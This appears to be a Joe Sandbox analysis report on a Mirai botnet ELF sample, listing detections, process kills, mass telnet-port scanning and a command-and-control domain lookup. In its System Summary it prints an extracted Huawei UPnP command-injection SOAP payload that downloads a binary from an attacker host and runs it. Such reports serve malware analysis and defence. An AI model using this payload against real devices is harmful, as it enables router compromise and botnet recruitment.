Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
gJxUBR0ghC.elf

Overview

General Information

Sample Name:gJxUBR0ghC.elf
Original Sample Name:0e31e21ca91e71319a6ea3f001152463.elf
Analysis ID:1351985
MD5:0e31e21ca91e71319a6ea3f001152463
SHA1:7d1a04607d6f5c2224e15bbcdb36701aa2249fc3
SHA256:cd84c1a2b08b147d9e51fadddc3240342a0c49369fbb9305e31c2566966fb35e
Tags:32elfmiraisparc
Infos:

Detection

Mirai
Score:76
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Yara detected Mirai
Multi AV Scanner detection for submitted file
Sample tries to kill multiple processes (SIGKILL)
Reads CPU information from /sys indicative of miner or evasive malware
Sample has stripped symbol table
Uses the "uname" system call to query kernel version information (possible evasion)
Enumerates processes within the "proc" file system
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Detected TCP or UDP traffic on non-standard ports
Executes the "rm" command used to delete files or directories
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Classification

Analysis Advice

Static ELF header machine description suggests that the sample might not execute correctly on this machine.
All HTTP servers contacted by the sample do not answer. The sample is likely an old dropper which does no longer work.
Joe Sandbox Version:38.0.0 Ammolite
Analysis ID:1351985
Start date and time:2023-12-02 10:39:16 +01:00
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 5m 26s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample file name:gJxUBR0ghC.elf
renamed because original name is a hash value
Original Sample Name:0e31e21ca91e71319a6ea3f001152463.elf
Detection:MAL
Classification:mal76.spre.troj.linELF@0/0@1/0
Command:/tmp/gJxUBR0ghC.elf
PID:6241
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
J4d3Gr33n.
Standard Error:
  • system is lnxubuntu20
  • dash New Fork (PID: 6232, Parent: 4331)
  • rm (PID: 6232, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.o6Plogs1yr /tmp/tmp.qA58EAPoKE /tmp/tmp.KPTn6A0K4J
  • wrapper-2.0 (PID: 6256, Parent: 2063, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libsystray.so 6 12582920 systray "Notification Area" "Area where notification icons appear"
  • wrapper-2.0 (PID: 6257, Parent: 2063, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libstatusnotifier.so 7 12582921 statusnotifier "Status Notifier Plugin" "Provides a panel area for status notifier items (application indicators)"
  • wrapper-2.0 (PID: 6258, Parent: 2063, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libpulseaudio-plugin.so 8 12582922 pulseaudio "PulseAudio Plugin" "Adjust the audio volume of the PulseAudio sound system"
  • wrapper-2.0 (PID: 6259, Parent: 2063, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libxfce4powermanager.so 9 12582923 power-manager-plugin "Power Manager Plugin" "Display the battery levels of your devices and control the brightness of your display"
  • wrapper-2.0 (PID: 6260, Parent: 2063, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libnotification-plugin.so 10 12582924 notification-plugin "Notification Plugin" "Notification plugin for the Xfce panel"
  • wrapper-2.0 (PID: 6261, Parent: 2063, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libactions.so 14 12582925 actions "Action Buttons" "Log out, lock or other system actions"
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
gJxUBR0ghC.elfJoeSecurity_Mirai_6Yara detected MiraiJoe Security
    gJxUBR0ghC.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
      SourceRuleDescriptionAuthorStrings
      6241.1.00007f4ae4011000.00007f4ae402f000.r-x.sdmpJoeSecurity_Mirai_6Yara detected MiraiJoe Security
        6241.1.00007f4ae4011000.00007f4ae402f000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
          6247.1.00007f4ae4011000.00007f4ae402f000.r-x.sdmpJoeSecurity_Mirai_6Yara detected MiraiJoe Security
            6247.1.00007f4ae4011000.00007f4ae402f000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
              6251.1.00007f4ae4011000.00007f4ae402f000.r-x.sdmpJoeSecurity_Mirai_6Yara detected MiraiJoe Security
                Click to see the 4 entries
                No Snort rule has matched

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: gJxUBR0ghC.elfAvira: detected
                Source: gJxUBR0ghC.elfReversingLabs: Detection: 54%
                Source: gJxUBR0ghC.elfVirustotal: Detection: 53%Perma Link
                Source: /tmp/gJxUBR0ghC.elf (PID: 6245)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/topology/thread_siblings_listJump to behavior
                Source: /tmp/gJxUBR0ghC.elf (PID: 6245)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/topology/thread_siblings_listJump to behavior
                Source: global trafficTCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
                Source: global trafficTCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 165.203.59.38:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 110.173.66.44:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 159.233.26.216:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 68.41.123.159:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 165.21.73.54:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 218.151.161.203:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 81.108.243.144:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 190.173.151.212:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 8.181.199.100:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 148.147.38.234:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 78.113.170.132:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 108.211.20.70:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 62.152.235.55:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 115.47.59.9:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 146.125.164.149:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 113.81.35.152:2323
                Source: global trafficTCP traffic: 192.168.2.23:39222 -> 5.181.156.131:2609
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 187.72.75.7:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 206.189.246.99:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 161.208.113.46:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 119.93.251.115:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 186.171.235.95:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 113.38.138.60:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 168.25.147.220:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 210.0.142.218:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 73.212.105.119:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 205.180.168.102:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 105.87.48.186:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 202.21.16.237:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 117.27.171.196:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 141.132.250.138:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 117.40.109.157:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 122.93.244.79:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 184.145.157.203:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 171.207.90.186:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 31.121.11.192:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 27.96.219.130:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 211.202.54.115:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 123.189.207.247:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 82.4.115.108:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 198.88.185.211:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 223.137.143.204:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 176.100.4.187:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 202.63.228.171:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 207.116.191.26:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 59.228.68.173:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 154.158.255.17:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 93.200.198.135:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 104.244.184.151:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 145.123.217.222:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 135.180.212.144:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 179.232.156.190:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 118.197.207.122:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 157.222.197.12:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 110.20.71.144:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 184.65.71.211:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 182.213.43.225:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 119.255.200.234:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 189.199.51.10:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 117.75.39.163:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 148.189.205.228:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 92.98.134.135:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 188.17.178.132:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 77.187.59.174:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 102.95.122.41:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 154.251.22.16:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 68.100.117.43:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 34.232.251.197:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 198.116.95.129:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 77.158.66.254:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 109.47.5.76:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 164.110.68.53:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 43.26.221.105:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 124.226.17.156:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 53.107.111.50:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 1.208.186.85:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 37.31.150.26:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 103.85.139.164:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 118.85.221.5:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 99.52.2.222:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 85.218.244.56:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 217.214.76.212:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 156.225.219.213:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 183.172.172.25:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 108.237.131.240:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 181.151.212.212:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 27.136.119.190:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 188.81.53.106:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 5.101.194.148:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 110.191.105.75:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 24.64.40.48:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 125.119.37.4:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 80.99.252.153:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 1.240.39.255:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 179.54.5.43:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 58.140.146.204:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 120.54.0.153:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 17.230.167.106:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 37.246.133.17:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 47.5.85.73:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 96.163.67.129:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 97.122.162.160:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 122.111.67.131:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 149.74.18.35:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 189.25.88.197:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 111.107.37.212:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 23.91.153.107:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 18.121.191.147:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 78.6.152.54:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 118.161.157.58:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 2.108.200.64:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 72.144.193.24:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 210.139.162.117:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 177.73.217.15:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 86.173.18.42:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 80.40.122.198:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 210.220.7.58:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 96.254.97.235:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 211.47.135.10:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 221.211.177.12:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 134.251.91.132:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 71.154.129.37:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 167.234.76.5:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 95.55.215.53:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 65.83.224.161:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 174.110.222.62:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 20.237.46.49:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 121.219.154.51:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 199.32.242.141:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 44.111.81.163:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 5.20.140.77:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 198.127.190.204:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 168.123.135.93:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 130.196.90.228:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 18.131.21.145:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 88.111.124.116:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 98.45.121.84:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 91.127.87.93:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 13.31.100.69:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 46.118.172.41:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 13.44.198.176:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 216.236.196.217:2323
                Source: global trafficTCP traffic: 192.168.2.23:50668 -> 133.129.157.205:2323
                Source: /tmp/gJxUBR0ghC.elf (PID: 6241)Socket: 127.0.0.1::41537Jump to behavior
                Source: unknownDNS traffic detected: queries for: cnc.chromies.cf
                Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
                Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
                Source: unknownTCP traffic detected without corresponding DNS query: 165.203.59.38
                Source: unknownTCP traffic detected without corresponding DNS query: 146.125.9.38
                Source: unknownTCP traffic detected without corresponding DNS query: 218.64.26.202
                Source: unknownTCP traffic detected without corresponding DNS query: 136.176.150.37
                Source: unknownTCP traffic detected without corresponding DNS query: 60.7.28.41
                Source: unknownTCP traffic detected without corresponding DNS query: 4.114.178.4
                Source: unknownTCP traffic detected without corresponding DNS query: 126.144.16.76
                Source: unknownTCP traffic detected without corresponding DNS query: 113.161.251.111
                Source: unknownTCP traffic detected without corresponding DNS query: 31.249.217.56
                Source: unknownTCP traffic detected without corresponding DNS query: 219.198.25.231
                Source: unknownTCP traffic detected without corresponding DNS query: 98.4.125.59
                Source: unknownTCP traffic detected without corresponding DNS query: 152.11.21.192
                Source: unknownTCP traffic detected without corresponding DNS query: 98.70.172.164
                Source: unknownTCP traffic detected without corresponding DNS query: 193.88.59.156
                Source: unknownTCP traffic detected without corresponding DNS query: 211.159.75.93
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.147.93
                Source: unknownTCP traffic detected without corresponding DNS query: 38.114.208.45
                Source: unknownTCP traffic detected without corresponding DNS query: 91.235.114.198
                Source: unknownTCP traffic detected without corresponding DNS query: 126.20.48.14
                Source: unknownTCP traffic detected without corresponding DNS query: 159.233.26.216
                Source: unknownTCP traffic detected without corresponding DNS query: 193.254.119.28
                Source: unknownTCP traffic detected without corresponding DNS query: 12.105.7.213
                Source: unknownTCP traffic detected without corresponding DNS query: 80.208.20.158
                Source: unknownTCP traffic detected without corresponding DNS query: 163.71.157.199
                Source: unknownTCP traffic detected without corresponding DNS query: 157.215.73.46
                Source: unknownTCP traffic detected without corresponding DNS query: 198.136.202.108
                Source: unknownTCP traffic detected without corresponding DNS query: 18.121.112.142
                Source: unknownTCP traffic detected without corresponding DNS query: 68.41.123.159
                Source: unknownTCP traffic detected without corresponding DNS query: 88.239.75.115
                Source: unknownTCP traffic detected without corresponding DNS query: 91.109.103.105
                Source: unknownTCP traffic detected without corresponding DNS query: 202.227.165.150
                Source: unknownTCP traffic detected without corresponding DNS query: 34.63.251.198
                Source: unknownTCP traffic detected without corresponding DNS query: 196.87.127.136
                Source: unknownTCP traffic detected without corresponding DNS query: 126.70.132.206
                Source: unknownTCP traffic detected without corresponding DNS query: 128.4.209.102
                Source: unknownTCP traffic detected without corresponding DNS query: 2.140.202.82
                Source: unknownTCP traffic detected without corresponding DNS query: 122.76.209.96
                Source: unknownTCP traffic detected without corresponding DNS query: 23.209.230.201
                Source: unknownTCP traffic detected without corresponding DNS query: 158.31.97.7
                Source: unknownTCP traffic detected without corresponding DNS query: 165.21.73.54
                Source: unknownTCP traffic detected without corresponding DNS query: 18.188.180.106
                Source: unknownTCP traffic detected without corresponding DNS query: 203.80.108.65
                Source: unknownTCP traffic detected without corresponding DNS query: 84.239.103.246
                Source: unknownTCP traffic detected without corresponding DNS query: 148.146.141.94
                Source: unknownTCP traffic detected without corresponding DNS query: 113.168.31.20
                Source: unknownTCP traffic detected without corresponding DNS query: 123.120.71.33
                Source: unknownTCP traffic detected without corresponding DNS query: 121.237.233.38
                Source: unknownTCP traffic detected without corresponding DNS query: 48.107.196.23
                Source: unknownTCP traffic detected without corresponding DNS query: 81.122.69.117
                Source: gJxUBR0ghC.elfString found in binary or memory: http://scan.chromies.cf/9x83HE5AFD/arm7.jade
                Source: gJxUBR0ghC.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                Source: gJxUBR0ghC.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/

                System Summary

                barindex
                Source: /tmp/gJxUBR0ghC.elf (PID: 6248)SIGKILL sent: pid: 904, result: successfulJump to behavior
                Source: /tmp/gJxUBR0ghC.elf (PID: 6248)SIGKILL sent: pid: 2018, result: successfulJump to behavior
                Source: /tmp/gJxUBR0ghC.elf (PID: 6248)SIGKILL sent: pid: 2077, result: successfulJump to behavior
                Source: /tmp/gJxUBR0ghC.elf (PID: 6248)SIGKILL sent: pid: 2078, result: successfulJump to behavior
                Source: /tmp/gJxUBR0ghC.elf (PID: 6248)SIGKILL sent: pid: 2079, result: successfulJump to behavior
                Source: /tmp/gJxUBR0ghC.elf (PID: 6248)SIGKILL sent: pid: 2080, result: successfulJump to behavior
                Source: /tmp/gJxUBR0ghC.elf (PID: 6248)SIGKILL sent: pid: 2083, result: successfulJump to behavior
                Source: /tmp/gJxUBR0ghC.elf (PID: 6248)SIGKILL sent: pid: 2084, result: successfulJump to behavior
                Source: /tmp/gJxUBR0ghC.elf (PID: 6248)SIGKILL sent: pid: 2156, result: successfulJump to behavior
                Source: /tmp/gJxUBR0ghC.elf (PID: 6248)SIGKILL sent: pid: 2226, result: successfulJump to behavior
                Source: /tmp/gJxUBR0ghC.elf (PID: 6248)SIGKILL sent: pid: 6251, result: successfulJump to behavior
                Source: /tmp/gJxUBR0ghC.elf (PID: 6248)SIGKILL sent: pid: 6256, result: successfulJump to behavior
                Source: /tmp/gJxUBR0ghC.elf (PID: 6248)SIGKILL sent: pid: 6257, result: successfulJump to behavior
                Source: /tmp/gJxUBR0ghC.elf (PID: 6248)SIGKILL sent: pid: 6258, result: successfulJump to behavior
                Source: /tmp/gJxUBR0ghC.elf (PID: 6248)SIGKILL sent: pid: 6259, result: successfulJump to behavior
                Source: /tmp/gJxUBR0ghC.elf (PID: 6248)SIGKILL sent: pid: 6260, result: successfulJump to behavior
                Source: /tmp/gJxUBR0ghC.elf (PID: 6248)SIGKILL sent: pid: 6261, result: successfulJump to behavior
                Source: ELF static info symbol of initial sample.symtab present: no
                Source: /tmp/gJxUBR0ghC.elf (PID: 6248)SIGKILL sent: pid: 904, result: successfulJump to behavior
                Source: /tmp/gJxUBR0ghC.elf (PID: 6248)SIGKILL sent: pid: 2018, result: successfulJump to behavior
                Source: /tmp/gJxUBR0ghC.elf (PID: 6248)SIGKILL sent: pid: 2077, result: successfulJump to behavior
                Source: /tmp/gJxUBR0ghC.elf (PID: 6248)SIGKILL sent: pid: 2078, result: successfulJump to behavior
                Source: /tmp/gJxUBR0ghC.elf (PID: 6248)SIGKILL sent: pid: 2079, result: successfulJump to behavior
                Source: /tmp/gJxUBR0ghC.elf (PID: 6248)SIGKILL sent: pid: 2080, result: successfulJump to behavior
                Source: /tmp/gJxUBR0ghC.elf (PID: 6248)SIGKILL sent: pid: 2083, result: successfulJump to behavior
                Source: /tmp/gJxUBR0ghC.elf (PID: 6248)SIGKILL sent: pid: 2084, result: successfulJump to behavior
                Source: /tmp/gJxUBR0ghC.elf (PID: 6248)SIGKILL sent: pid: 2156, result: successfulJump to behavior
                Source: /tmp/gJxUBR0ghC.elf (PID: 6248)SIGKILL sent: pid: 2226, result: successfulJump to behavior
                Source: /tmp/gJxUBR0ghC.elf (PID: 6248)SIGKILL sent: pid: 6251, result: successfulJump to behavior
                Source: /tmp/gJxUBR0ghC.elf (PID: 6248)SIGKILL sent: pid: 6256, result: successfulJump to behavior
                Source: /tmp/gJxUBR0ghC.elf (PID: 6248)SIGKILL sent: pid: 6257, result: successfulJump to behavior
                Source: /tmp/gJxUBR0ghC.elf (PID: 6248)SIGKILL sent: pid: 6258, result: successfulJump to behavior
                Source: /tmp/gJxUBR0ghC.elf (PID: 6248)SIGKILL sent: pid: 6259, result: successfulJump to behavior
                Source: /tmp/gJxUBR0ghC.elf (PID: 6248)SIGKILL sent: pid: 6260, result: successfulJump to behavior
                Source: /tmp/gJxUBR0ghC.elf (PID: 6248)SIGKILL sent: pid: 6261, result: successfulJump to behavior
                Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g scan.chromies.cf -l /tmp/binary -r /9x83HEAFD/mips.jade; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: classification engineClassification label: mal76.spre.troj.linELF@0/0@1/0
                Source: /tmp/gJxUBR0ghC.elf (PID: 6248)File opened: /proc/6196/cmdlineJump to behavior
                Source: /tmp/gJxUBR0ghC.elf (PID: 6248)File opened: /proc/6196/mapsJump to behavior
                Source: /tmp/gJxUBR0ghC.elf (PID: 6248)File opened: /proc/6196/exeJump to behavior
                Source: /tmp/gJxUBR0ghC.elf (PID: 6248)File opened: /proc/1582/cmdlineJump to behavior
                Source: /tmp/gJxUBR0ghC.elf (PID: 6248)File opened: /proc/1582/mapsJump to behavior
                Source: /tmp/gJxUBR0ghC.elf (PID: 6248)File opened: /proc/1582/exeJump to behavior
                Source: /tmp/gJxUBR0ghC.elf (PID: 6248)File opened: /proc/2033/cmdlineJump to behavior
                Source: /tmp/gJxUBR0ghC.elf (PID: 6248)File opened: /proc/2033/mapsJump to behavior
                Source: /tmp/gJxUBR0ghC.elf (PID: 6248)File opened: /proc/2033/exeJump to behavior
                Source: /tmp/gJxUBR0ghC.elf (PID: 6248)File opened: /proc/2275/cmdlineJump to behavior
                Source: /tmp/gJxUBR0ghC.elf (PID: 6248)File opened: /proc/2275/mapsJump to behavior
                Source: /tmp/gJxUBR0ghC.elf (PID: 6248)File opened: /proc/2275/exeJump to behavior
                Source: /tmp/gJxUBR0ghC.elf (PID: 6248)File opened: /proc/3088/cmdlineJump to behavior
                Source: /tmp/gJxUBR0ghC.elf (PID: 6248)File opened: /proc/3088/mapsJump to behavior
                Source: /tmp/gJxUBR0ghC.elf (PID: 6248)File opened: /proc/3088/exeJump to behavior
                Source: /tmp/gJxUBR0ghC.elf (PID: 6248)File opened: /proc/1612/cmdlineJump to behavior
                Source: /tmp/gJxUBR0ghC.elf (PID: 6248)File opened: /proc/1612/mapsJump to behavior
                Source: /tmp/gJxUBR0ghC.elf (PID: 6248)File opened: /proc/1612/exeJump to behavior
                Source: /tmp/gJxUBR0ghC.elf (PID: 6248)File opened: /proc/1579/cmdlineJump to behavior
                Source: /tmp/gJxUBR0ghC.elf (PID: 6248)File opened: /proc/1579/mapsJump to behavior
                Source: /tmp/gJxUBR0ghC.elf (PID: 6248)File opened: /proc/1579/exeJump to behavior
                Source: /tmp/gJxUBR0ghC.elf (PID: 6248)File opened: /proc/1699/cmdlineJump to behavior
                Source: /tmp/gJxUBR0ghC.elf (PID: 6248)File opened: /proc/1699/mapsJump to behavior
                Source: /tmp/gJxUBR0ghC.elf (PID: 6248)File opened: /proc/1699/exeJump to behavior
                Source: /tmp/gJxUBR0ghC.elf (PID: 6248)File opened: /proc/1335/cmdlineJump to behavior
                Source: /tmp/gJxUBR0ghC.elf (PID: 6248)File opened: /proc/1335/mapsJump to behavior
                Source: /tmp/gJxUBR0ghC.elf (PID: 6248)File opened: /proc/1335/exeJump to behavior
                Source: /tmp/gJxUBR0ghC.elf (PID: 6248)File opened: /proc/1698/cmdlineJump to behavior
                Source: /tmp/gJxUBR0ghC.elf (PID: 6248)File opened: /proc/1698/mapsJump to behavior
